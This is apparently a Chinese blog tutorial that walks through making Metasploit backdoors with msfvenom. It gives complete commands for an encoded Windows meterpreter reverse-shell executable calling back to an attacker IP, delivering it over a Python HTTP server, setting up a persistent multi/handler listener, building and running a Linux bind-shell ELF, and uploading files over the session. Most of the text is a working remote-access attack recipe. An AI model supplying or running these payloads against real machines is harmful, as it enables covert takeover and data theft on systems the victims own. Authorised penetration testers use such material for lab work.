目录

一、生成windows后门

二、生成linux后门

解决shell乱码

上传文件

一、生成windows后门

1. 生成windows后门

msfvenom -platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.1.3 lport=4444 -b"\x00" -e x86/shikata_ga_nai -f exe >  ./payload2.exe

  • -b   需要排除的字符
  • -e   编码方式
  • -f    输出格式
  • LHOST      本地机器的地址,供木马连接

接着将payload发送到win2012主机上,这里用python开启一个web服务,python3 -m http.server 5555

2. msf 开启主监听端口

  • msfconsole
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • show options
  • set lhost 192.168.1.3 ,set lport 4444 (和一开始设置的后门程序的端口一样)

#持续监听

  • set ExitOnSession false

#攻击在后台进行

  • exploit -j

此时meterpreter获取到了一个session即shell反弹成功,但只是一个低权限的session。如果本机开了防火墙则可能靶机连接不上我们的机器,会阻止端口进行连接我们。

可见只是一个管理员的权限,并不是system权限

二、生成linux后门

1. 生成正向连接后门

正向连接是靶机开放端口,攻击机连过去;反向连接是攻击机开放端口,靶机连过来;

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=8000 -f elf > bindtcp.elf

加执行权限

chmod 777 bindtcp.elf

运行

./bindtcp.elf

攻击机开启连接,其会主动连接靶机的8000端口:

  • msfconsole
  • use exploit/multi/handler
  • set payload linux/x64/meterpreter/bind_tcp
  • set rhost xx.xx.xx.xx
  • set lport 8000    (刚才设置的端口)
  • run

解决shell乱码

chcp 65001

上传文件

upload  本地文件路径\文件名   目标路径\文件名

windows下要用两个斜杠

msfvenom生成后门程序及利用相关推荐

  1. msfvenom生成木马的简单利用

    msfvenom生成木马的简单利用 1.简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10. 2.实 ...

  2. 利用msfvenom生成后门木马

    msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...

  3. 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

    MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...

  4. Java 技术篇-利用exe4j工具生成exe文件实例演示,IntelliJ IDEA将项目转化为jar包方法,运行生成后的程序弹出exe4j提示处理,生成的程序显示控制台设置方法

    Java 项目转化为 exe 可执行文件 第一章:IntelliJ IDEA 将项目转化为 jar 包 ① 设置 Artifacts ② 设置是否集成外部 jar 包 ③ 将 java 项目转化为 j ...

  5. 利用mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL

    通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...

  6. msfvenom生成木马和内网穿透

    msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...

  7. Msfvenonm生成后门

    目录 Msfvenom 生成exe木马 生成Linux木马 方法一: 方法二: 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法.传送门-->Metasp ...

  8. kali metasploit 制作后门程序远程操控基本使用方法

    kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_t ...

  9. kali生成后门远程控制电脑或手机

    一.复现环境 Kali平台(Hack):192.168.25.128 靶机:192.168.25.106 Android模拟器(靶机1):192.168.25.106 注意,手机端控制必须使手机和 ...

  10. 使用 .NET WinForm 开发所见即所得的 IDE 开发环境,实现不写代码直接生成应用程序...

    GitHub:https://github.com/iccb1013/Sheng.Winform.IDE SailingEase WinForm Framework WinForm开发框架开发手册:h ...

最新文章

  1. AI在管理临床试验设计和执行中,人和机器还在学习曲线上?
  2. python菜鸟编程-Python3 函数
  3. 网工路由基础(3)RIP原理与配置
  4. matlab如何创建table,MATLAB table数据结构 首篇
  5. matlab 滤波器设计 coe_一种半带滤波器的低功耗实现方法
  6. 基本排序看这篇就够了
  7. 端口扫描实验和Dos攻击实验
  8. 微信接口请求次数_微信接口调用次数限制 支付宝微信提现
  9. 2018计算机应用基础作业一,2018计算机应用基础试题及答案
  10. 量子计算机王,王正汉|量子计算机:下一轮工业革命的引擎
  11. python与vfp做桌面数据库_Python:如何提高将数据从vfp(dbf)加载到oracle的效率?...
  12. Java读取Oracle中LONG类型数据
  13. 看完这篇,你也可以实现一个360度全景插件
  14. java编程:对两个分数进行简单的算术运算
  15. input button 光标变为手型
  16. 【前端面试】04 HTTP协议
  17. 组装一台电脑需要哪些基本配件?
  18. Xshell配色美化
  19. MindMapper屏幕捕获功能该如何使用
  20. Go语言实现枚举方法,const和iota结合轻松实现

热门文章

  1. qq邮箱,网易邮箱,smtp邮箱发邮件
  2. 现代治理12.0:Diligent发出“现代领导力”倡议,帮助组织创建更具多元化和包容性的董事会和领导团队
  3. 【操作系统】Main Memory
  4. php如何做防抖,Vue中怎么对事件进行防抖和节流操作?
  5. 辰智:2018中国餐饮大数据白皮书
  6. 【干货】JavaScript 资源大全
  7. ubuntu 安装 SMPlayer
  8. PHP友情链接检测代码
  9. 树莓派--【vim配置】
  10. 纯新手Java奋斗500天进腾讯,我给自己先来碗毒鸡汤